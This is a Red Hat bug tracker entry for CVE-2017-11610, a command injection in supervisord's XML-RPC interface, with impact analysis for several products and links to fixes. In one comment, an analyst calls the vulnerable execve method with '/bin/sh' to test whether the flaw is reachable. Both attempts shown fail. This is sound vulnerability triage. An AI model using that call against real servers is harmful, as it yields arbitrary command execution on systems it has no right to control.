Bug 1476143 (CVE-2017-11610)

Summary: CVE-2017-11610 supervisor: Command injection via malicious XML-RPC request
Product: [Other] Security Response Reporter: Andrej Nemec <anemec>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: agrimm, avibelli, cpelland, dajohnso, drusso, gblomqui, gmccullo, gtanzill, hhudgeon, jal233, jbalunas, jfrey, jhardy, jmrazek, jprause, jshepherd, kevin, obarenbo, roliveri, rrajasek, simaishi, sisharma, tkirby, troxor0, tsao
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: supervisor 3.3.3 Doc Type: If docs needed, set a value
Doc Text:
A vulnerability was found in the XML-RPC interface in supervisord. When processing malformed commands, an attacker can cause arbitrary shell commands to be executed on the server as the same user as supervisord. Exploitation requires the attacker to first be authenticated to the supervisord service.
 Story Points: ---
Clone Of: Environment:
Last Closed: 2019-06-08 03:19:10 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1476144, 1476145, 1476286, 1476287, 1476355, 1476356, 1477924    
Bug Blocks: 1476147    

Description Andrej Nemec 2017-07-28 06:57:02 UTC 
 A vulnerability has been found where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this may be root.

Upstream issue:

https://github.com/Supervisor/supervisor/issues/964

Upstream patches:

3.3.3 https://github.com/Supervisor/supervisor/commit/058f46141e346b18dee0497ba11203cb81ecb19e
3.2.4 https://github.com/Supervisor/supervisor/commit/aac3c21893cab7361f5c35c8e20341b298f6462e
3.1.4 https://github.com/Supervisor/supervisor/commit/dbe0f55871a122eac75760aef511efc3a8830b88
3.0.1 https://github.com/Supervisor/supervisor/commit/83060f3383ebd26add094398174f1de34cf7b7f0
Comment 1 Andrej Nemec 2017-07-28 06:57:27 UTC 
Created supervisor tracking bugs for this issue:

Affects: epel-all [bug 1476145]
Affects: fedora-all [bug 1476144]
Comment 2 Siddharth Sharma 2017-07-28 10:49:10 UTC 
Analysis:

Default install on Red Hat Ceph Storage does not run any service on port 9001 and does not accept connection. 

~]$ python2
Python 2.7.5 (default, Aug  2 2016, 04:20:16) 
[GCC 4.8.5 20150623 (Red Hat 4.8.5-4)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from xmlrpclib import ServerProxy
>>> from supervisor.xmlrpc import SupervisorTransport
>>> server = ServerProxy('http://127.0.0.1/RPC2', SupervisorTransport('', '', 'unix:///var/tmp/supervisord.sock'))
>>> server.supervisor.supervisord.options.execve('/bin/sh', [], {})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1233, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1587, in __request
    verbose=self.__verbose
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 460, in request
    self.connection.request('POST', handler, request_body, self.headers)
  File "/usr/lib64/python2.7/httplib.py", line 1017, in request
    self._send_request(method, url, body, headers)
  File "/usr/lib64/python2.7/httplib.py", line 1051, in _send_request
    self.endheaders(body)
  File "/usr/lib64/python2.7/httplib.py", line 1013, in endheaders
    self._send_output(message_body)
  File "/usr/lib64/python2.7/httplib.py", line 864, in _send_output
    self.send(msg)
  File "/usr/lib64/python2.7/httplib.py", line 826, in send
    self.connect()
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 481, in connect
    self.sock.connect(self.socketfile)
  File "/usr/lib64/python2.7/socket.py", line 224, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 2] No such file or directory

supervisor package is used by calamari which uses following configuration in default install 

~]# vi /etc/supervisor/conf.d/calamari.conf

[supervisord]
loglevel=warn
logfile=/var/log/calamari/supervisord.log
childlogdir=/var/log/calamari

[program:carbon-cache]
command=/opt/calamari/venv/bin/carbon-cache.py --debug --config /etc/graphite/carbon.conf start

[program:cthulhu]
command=/opt/calamari/venv/bin/cthulhu-manager
stderr_logfile = /var/log/calamari/cthulhu_stderr.log
stdout_logfile = /var/log/calamari/cthulhu_stdout.log


http server is not enabled
~]# vi /etc/supervisord.conf 
;[inet_http_server]         ; inet (TCP) server disabled by default
;port=127.0.0.1:9001        ; (ip_address:port specifier, *:port for all iface)


1. If server is enabled is enabled (manually enabling server)
INFO RPC interface 'supervisor' initialized
CRIT Server 'inet_http_server' running without any HTTP authentication checking
INFO supervisord started with pid 23888
TRAC XML-RPC method called: supervisor.supervisord.options.execve()


2. with unix domain socket:

>>> from xmlrpclib import ServerProxy
>>> from supervisor.xmlrpc import SupervisorTransport
>>> server = ServerProxy('http://127.0.0.1/RPC2',SupervisorTransport('', '', 'unix:///tmp/supervisord.sock'))
>>> server.supervisor.supervisord.options.execve('/bin/sh', [], {})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1233, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1587, in __request
    verbose=self.__verbose
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 460, in request
    self.connection.request('POST', handler, request_body, self.headers)
  File "/usr/lib64/python2.7/httplib.py", line 1017, in request
    self._send_request(method, url, body, headers)
  File "/usr/lib64/python2.7/httplib.py", line 1051, in _send_request
    self.endheaders(body)
  File "/usr/lib64/python2.7/httplib.py", line 1013, in endheaders
    self._send_output(message_body)
  File "/usr/lib64/python2.7/httplib.py", line 864, in _send_output
    self.send(msg)
  File "/usr/lib64/python2.7/httplib.py", line 826, in send
    self.connect()
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 481, in connect
    self.sock.connect(self.socketfile)
  File "/usr/lib64/python2.7/socket.py", line 224, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 13] Permission denied
Comment 5 Jason Shepherd 2017-07-31 04:32:12 UTC 
Supervisor is used by the Nagios componet of RHMAP. In the supervisor configuration the XMLRPC plugin is not enabled. Also the Nagios images only exposes port 8080 (httpd), not (9001) XMLRPC network port.

Marking RHMAP as not affected.
Comment 6 Kurt Seifried 2017-07-31 12:02:23 UTC 
Updated CVSSv3 score to reflect the fact that while several products use this component they do not expose he supervisor service to the network by default. Downgrading to medium because of this and the fact that these products also do not have local untrusted user accounts.
Comment 8 errata-xmlrpc 2017-10-24 00:42:45 UTC 
This issue has been addressed in the following products:

  CloudForms Management Engine 5.8

Via RHSA-2017:3005 https://access.redhat.com/errata/RHSA-2017:3005